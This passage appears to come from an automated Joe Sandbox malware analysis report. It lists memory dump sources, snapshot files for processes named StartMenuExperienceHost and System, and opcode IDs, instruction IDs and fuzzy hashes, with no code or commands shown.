              • Instruction Fuzzy Hash: 4501F230A49249CFDB99EF64C4E92FE3BA0FF0A301F0114BED41AC6592DE39A554C780
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction ID: 4cef8e030627cccb8470396301aa5c2de9c78b2c9b52258fb404a5ac2b111e43
              • Opcode Fuzzy Hash: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction Fuzzy Hash: 9201D170A1450ECFEB98EB64C8A82BA37A4FF1A305F90887ED51ED21D1DE79B050C680
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction ID: 80d6c74dad3dd560155680c260b8c78db1903b5c5d4c3e089def3d8e5425b8a1
              • Opcode Fuzzy Hash: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction Fuzzy Hash: 11016D70A1890ECAEB58EB6488A82B977A0FF1A305F50887ED41ED21D1DF7AB550D680
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction ID: 0ef52f64f8eadecb1c6e1c121e74b62e04a81927c5a27138b94ad327b79dd881
              • Opcode Fuzzy Hash: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction Fuzzy Hash: CAF0A470A0964E8FEB94DF24C8A52BA3BA0FF56304F80417AD80CC2292DB79E554D780
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction ID: ac0f5b8789d472bb0678553e31bff10e5ff637a0f7bef76d5edeb519005ba578
              • Opcode Fuzzy Hash: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction Fuzzy Hash: 6CF0867090964ACFEB549F64C8A91F93FE0FF0A314F40497AE918C2051DBB85561D780
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction ID: ac1bc90c97dd83f338b37dc495fbaf86ef317c4adec960a3489529a61ba5e7c4
              • Opcode Fuzzy Hash: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction Fuzzy Hash: B5F0A471A1C60DDEFB51EB3488DA5FD7BD0EF1A300F408871D508C2052EEB8B0549681
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction ID: 5b803ac11d9aabc30c27f4d8622695e83e30d09d994a7db27dc7c0deae7cc883
              • Opcode Fuzzy Hash: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction Fuzzy Hash: BAF0CD3090D3898FEB599F2488A92B93FB4BF06200F8548FAD619C61D2DA7CA454C791
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction ID: d0b3e812ab31591adb28e47968f3d050ea198338d031c78dcde1fff9319a5b41
              • Opcode Fuzzy Hash: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction Fuzzy Hash: D2F05E70A1860E8EEBC4EF6898592FE76A0FF15301F40053AE81DC2190DF346550C780
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction ID: 4af1c28f7f7542c0405f741d92d97629db8ba6b3375ebde65c0246d98ef41fe4
              • Opcode Fuzzy Hash: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction Fuzzy Hash: ABF0F671A0D689CFEB599F248C652B93FA0FF46300F8144BED519C20D2DB7EA414C340
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: f2764ab75f4f0512e8f60d3aa0a898028617ebb41d37341ac34d8f4ca0d6ff7d
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 9DF05E70A0865ACFDB10EB10CCA07A877A1FB51310F4042A9C14AD32D2DFB879859B41
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction ID: 125b28653c1e870cc639769c85b7230cb6eb49b3383d0f640ad982722c690d1b
              • Opcode Fuzzy Hash: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction Fuzzy Hash: 48D01260A4C40BC9DB60D614C894EFC76649F15300F60D5B1811DD2082DD7879C46B80
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction ID: 63db1404af45819677dc6c58ba0a205a0e8b5aa234beab250121d8183c996946
              • Opcode Fuzzy Hash: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction Fuzzy Hash: B6D0C9A6A2995E8FEB94DE1848951B97AA2E714284B115121D449D71A1EA2864029740
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: H$K$L${
              • API String ID: 0-964284359
              • Opcode ID: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction ID: 5bfeeb554f212ba7305527a54a0b5a1e917e3788b9ef13fec444f6b4fc7848a0
              • Opcode Fuzzy Hash: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction Fuzzy Hash: B30100B4E0922ACADF688F10C9A43FD7671AF56300F4040B9C31DA6281CB7C6A81DF80
              • Opcode ID: 77a36cba4a41dfa5e4c367c12fbeb281b207e9cf91f96054b663bcbe5c32e1bc
              • Instruction ID: 224f5cfb14ee5fba3da838f37dd111c31bed659e480cbaeaa43641ff565aeceb
              • Opcode Fuzzy Hash: 77a36cba4a41dfa5e4c367c12fbeb281b207e9cf91f96054b663bcbe5c32e1bc
              • Instruction Fuzzy Hash: 3441CC70E1891E8EDB64EB98C8A5BEDB7B1FF59300F1045B5D10DE3292DE7869819F80
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 41217ac9ad0dbebb240b9f25f12d413cceb752c67e2bfd3b7bc4f4974aefbe1e
              • Instruction ID: 651ff413a818be49582ccb36b78e9f5688f95862d41147130b818856cb992e7a
              • Opcode Fuzzy Hash: 41217ac9ad0dbebb240b9f25f12d413cceb752c67e2bfd3b7bc4f4974aefbe1e
              • Instruction Fuzzy Hash: 2221A271A0EA8ACBEBA5DB6484B62FD37A0FF16304F05047AD90DC2692DE39B454D781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b55081ca8445a163bcd8d71a92935d6336946215561f6721327c0447ac03f1f
              • Instruction ID: 3290d86203f90a39f5e51f1f72d8d531f600f42484d7ac3a01ec5d21c8849ed1
              • Opcode Fuzzy Hash: 3b55081ca8445a163bcd8d71a92935d6336946215561f6721327c0447ac03f1f
              • Instruction Fuzzy Hash: 6321AE71A1890ECEEB50EB6888AD6B977E5FF5A300F4049B6D11CD31A6EE38B5409780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction ID: ae6b2ee9e1b5831e2c475b2672928606ae44ecc5361abcae0f8f17591d7068b2
              • Opcode Fuzzy Hash: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction Fuzzy Hash: 27217F70A4864ECFEB95EB6488A92BA77E0FF1A304F0008BAD419D6191DF38A554D781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5ecebbeb7c3fdf93e41342cee421e28ca8ea53bebff149fb5de62bdd2029e563
              • Instruction ID: ae76312d7b4da48b23deabab8bb9d854374b0701a3f2a06a35e8aaceab359055
              • Opcode Fuzzy Hash: 5ecebbeb7c3fdf93e41342cee421e28ca8ea53bebff149fb5de62bdd2029e563
              • Instruction Fuzzy Hash: D121FBB2A1D58A9FE791EF7888A51FD7BF0EF06310F0440B7D958C7293DA38A4448781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4a8499a961abc29846855c9d1b07b5b5bd037203d9e3bd48bf6259193c29787
              • Instruction ID: f893f9eb34a73e409da115120c550eb4e15c57940616ad2a0dc4824f08d02c85
              • Opcode Fuzzy Hash: f4a8499a961abc29846855c9d1b07b5b5bd037203d9e3bd48bf6259193c29787
              • Instruction Fuzzy Hash: F6213171A1954ECEEB91AB7888992FE77E0FF1A300F0049B6D518D6191EA38F540D782
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bb9a7d19a75e074cc2ad255ee98366d11ed6c4fac61b07d406eae916016bd7e1
              • Instruction ID: 5a76d07e1cf133327e75df84ee1e3d0ba0fed72ee6a8ac666563824462d214ee
              • Opcode Fuzzy Hash: bb9a7d19a75e074cc2ad255ee98366d11ed6c4fac61b07d406eae916016bd7e1
              • Instruction Fuzzy Hash: B52144B1E0951ACFDB94EB98C8A09EDB7F1FF59310F10457AD109E7285DA38B901DBA0
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction ID: 470d1fbb3d9cddcb7076282c2ba81f86d7dfa25d17a5c9f252dffec1be3b4f6f
              • Opcode Fuzzy Hash: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction Fuzzy Hash: 0B214A70A1864D8FDB89EF68C495AE93BF0FF69315F01416AE80AD7251DB34E951CB80
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9e607a1f09b9ef201b89e871367ee9bfcde469aefad86b732787f646bf813b8
              • Instruction ID: 39240df42712ccb5d0e9b5d263e9e0386541b927042656f671365fda1a4a734a
              • Opcode Fuzzy Hash: c9e607a1f09b9ef201b89e871367ee9bfcde469aefad86b732787f646bf813b8
              • Instruction Fuzzy Hash: 6D21817194E6C98FD7869B2048B51A57FB0EF17300B1600EBC449CB6D3EA2D6559C751
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: abde656c1657a8ec1458ff0b194f143bcdac4ac104627183b54b6aa6c2661996
              • Instruction ID: a222959fc54c09ce8aab1de71dd5e09512577ccb8ec0e196660ea8aee346d2ca
              • Opcode Fuzzy Hash: abde656c1657a8ec1458ff0b194f143bcdac4ac104627183b54b6aa6c2661996
              • Instruction Fuzzy Hash: 8621233048E2C58FD7478B7088755F53FB0AF07214F0900EBD489CB1A3C92D2565C352
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction ID: 9ba8daaf3d6f6c91b7e397311d111ef2c5d19fe09b82ca086385cd23cb80280a
              • Opcode Fuzzy Hash: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction Fuzzy Hash: 6E21C67054D28A8FD342EBB488686A97FF0FF4B310F0544E6C045CB062DA3C9545C750
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80651f14cf0a170ffbc9937e9139424192b34913fd29173416315aef629d1954
              • Instruction ID: a5446c0f8fceb5e79a0327ce160554fd91444059eff73bcccb0a3fd6341d794c
              • Opcode Fuzzy Hash: 80651f14cf0a170ffbc9937e9139424192b34913fd29173416315aef629d1954
              • Instruction Fuzzy Hash: D311BE70A086498FDB88DF28D4A61F93BE1FF5A310F01017EE80AD3281CB38B551DB81
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b04476e8e34e083532a0a4c65e094c1697fe298907586cb63c4647c09525d95
              • Instruction ID: ae7351827cf3cbb2b28761a085eb8d3095be41c26cb1138228dda0f3bbd26af6
              • Opcode Fuzzy Hash: 0b04476e8e34e083532a0a4c65e094c1697fe298907586cb63c4647c09525d95
              • Instruction Fuzzy Hash: A911B470A08A0E8FDB94EF6484692FD77B0FF19305F00057BE409D6292DB38A440C780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc9ae20c07f40cebbf1387f66db5dac4556e7286f0450c12fa35185fa6d2a6ec
              • Instruction ID: 18c3871efada048badfd791ded2e9ddd46319596248f03ef3617bda71a95ea0a
              • Opcode Fuzzy Hash: bc9ae20c07f40cebbf1387f66db5dac4556e7286f0450c12fa35185fa6d2a6ec
              • Instruction Fuzzy Hash: 5311B471A0964ECFEB95EF6884A92FD7BF0FF59301F00057ED809D2292DA39A440C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cc8f296da0fd93e0e3e61cddaa043e6acea8580c7bd3a06365b740f0e335208
              • Instruction ID: aa42ababa476db2cc68c9bd367dcaddec6413f19a7caaf0338ee417c2825fd22
              • Opcode Fuzzy Hash: 3cc8f296da0fd93e0e3e61cddaa043e6acea8580c7bd3a06365b740f0e335208
              • Instruction Fuzzy Hash: A3117271A0964E9FDB98EF6884A92BD7BE0FF59305F0005BED40DD2292DA3AA544C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3490b15db0314cf6020755938179e50f09e52f5277e44a9bc957e8209c06d97f
              • Instruction ID: 6a02271b2a9c4657f62c15f86d9f939864cb473b6505559ab7d8a0e74cf8db77
              • Opcode Fuzzy Hash: 3490b15db0314cf6020755938179e50f09e52f5277e44a9bc957e8209c06d97f
              • Instruction Fuzzy Hash: D611B770909A4E8FDB95DF6884692BD77A1FF19301F4001BBD40DC3292DB39A544C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6dba1cb09c6b4d88cfc3ae5aea53d63b285cfc52ce6536f37ff5c31ca4245a38
              • Instruction ID: 13c3f9dbbc908579e063ff8f9d1556866fe99b2c28535fc0e4abd3d91543198d
              • Opcode Fuzzy Hash: 6dba1cb09c6b4d88cfc3ae5aea53d63b285cfc52ce6536f37ff5c31ca4245a38
              • Instruction Fuzzy Hash: BB11C8B1A0EA898BEBD5DF64C4F91B87BF0EF16308F0500BED50DC2692DD296454C741
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction ID: 6e2a7c2fe37166a7d79d2f26f899b31e7cd083db20bc9abaeef61836f3f5a2fa
              • Opcode Fuzzy Hash: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction Fuzzy Hash: 0401F562B2C6CADEE751EBB884A89A937E0EF57300F1144B2C548C6053ED38B485C2D1
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29baa4347c1c060840f125859efc7b86f50339236f3d4555b131620500eda74b
              • Instruction ID: 18072e7ef556732b9b5a7bc44ef1b4642f709e5bc56a49700d629e41d033c999
              • Opcode Fuzzy Hash: 29baa4347c1c060840f125859efc7b86f50339236f3d4555b131620500eda74b
              • Instruction Fuzzy Hash: 4E116370A1964A8FDB95EB6484692BE77F1FF1A304F4004BBD40DD6192DA38A440D781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1844d09fc5ffc5caed3a772d3fd5b1c8796ef51d0a1c3ba4db46743ef6949dd
              • Instruction ID: 44683cd8eb7a824977b6cebf63915065172b4e55632191c6448dcd9cc0b459bc
              • Opcode Fuzzy Hash: e1844d09fc5ffc5caed3a772d3fd5b1c8796ef51d0a1c3ba4db46743ef6949dd
              • Instruction Fuzzy Hash: 93112B71A09549CFEBA4EF2484BA2B97BE1FF16300F4104BED44DC22A2DE39B550C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b159a61a22a47115d31900f88e01eec3b889fe8deecdc15e44b3c495fc78213
              • Instruction ID: a358b836e4eb836417989a498c0d181d3463adfde05aaf84e6edfab91bf3623a
              • Opcode Fuzzy Hash: 6b159a61a22a47115d31900f88e01eec3b889fe8deecdc15e44b3c495fc78213
              • Instruction Fuzzy Hash: E1118E71A0A54A8FE781EB74C8986EA7BF4EF1A300F0009B7D419D7162DA38E540C750
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed3faafaf01940b45a91a12b2222b24670e30b9234bc217e068927956b26630a
              • Instruction ID: 90f1cda6a103af4a3e28ea03aa0329fb1340b2b1bf69094ed66a6f91d8ba9642
              • Opcode Fuzzy Hash: ed3faafaf01940b45a91a12b2222b24670e30b9234bc217e068927956b26630a
              • Instruction Fuzzy Hash: 98019670A1964EDFE791EB74849C6FA7BF1FF1A300F0044B6D418C71A2EA38A154C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ecb9e950be994e78ce02bd919054839f7bdc5963a77ed4b72c3a2f1385949fd4
              • Instruction ID: b1db04e6b1c9c1f0c5a76caa4743f3fdc71286d988cda832e95b3ebdbf6e2535
              • Opcode Fuzzy Hash: ecb9e950be994e78ce02bd919054839f7bdc5963a77ed4b72c3a2f1385949fd4
              • Instruction Fuzzy Hash: B7116D70A0964D8FEB94EF64C4A82FD7BE1FF2A305F1005BAD519D22D2DE39A540C741
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 79b6b56062da05b66dbb42b5e1cab99ede56a36750b511b826dd32ad1b15afee
              • Instruction ID: 9c3df3885edc69ac27ee55ea7ff49642cf3b63767bc2d41dd5941bbad0413aa9
              • Opcode Fuzzy Hash: 79b6b56062da05b66dbb42b5e1cab99ede56a36750b511b826dd32ad1b15afee
              • Instruction Fuzzy Hash: 9121EBB0E0461ACEEB64DF14C8A57EDB6B0FF56300F5001BAC50DA6291DB782A84DF81
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9588f7ba779137c97f49a224f09f166f5132a417df722eab53aa8d48c50c8671
              • Instruction ID: 587c4d2c2a652b0c321e22254b874d29a2236cfe846c431d90467bbbdfdc8031
              • Opcode Fuzzy Hash: 9588f7ba779137c97f49a224f09f166f5132a417df722eab53aa8d48c50c8671
              • Instruction Fuzzy Hash: 0611C471A0964A8FEBD8EF1484A52F97BE0EF56300F0001BAD909C2292DA39B454D7C1
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfb0c8bc3b5324576871dece35b5e8541961c41b9bcd1bc9893c9ad6cb6a71f8
              • Instruction ID: 0dc46fef8f3116e6fbcd56af5573e05d566e8a8b3ca42ba8b01b2e05eaebb28b
              • Opcode Fuzzy Hash: bfb0c8bc3b5324576871dece35b5e8541961c41b9bcd1bc9893c9ad6cb6a71f8
              • Instruction Fuzzy Hash: 8E21CAB0E1451ACEEBA5EB24C8A57E977B1FF46300F5001FAD50DE2291DE782A85DF80
              Memory Dump Source
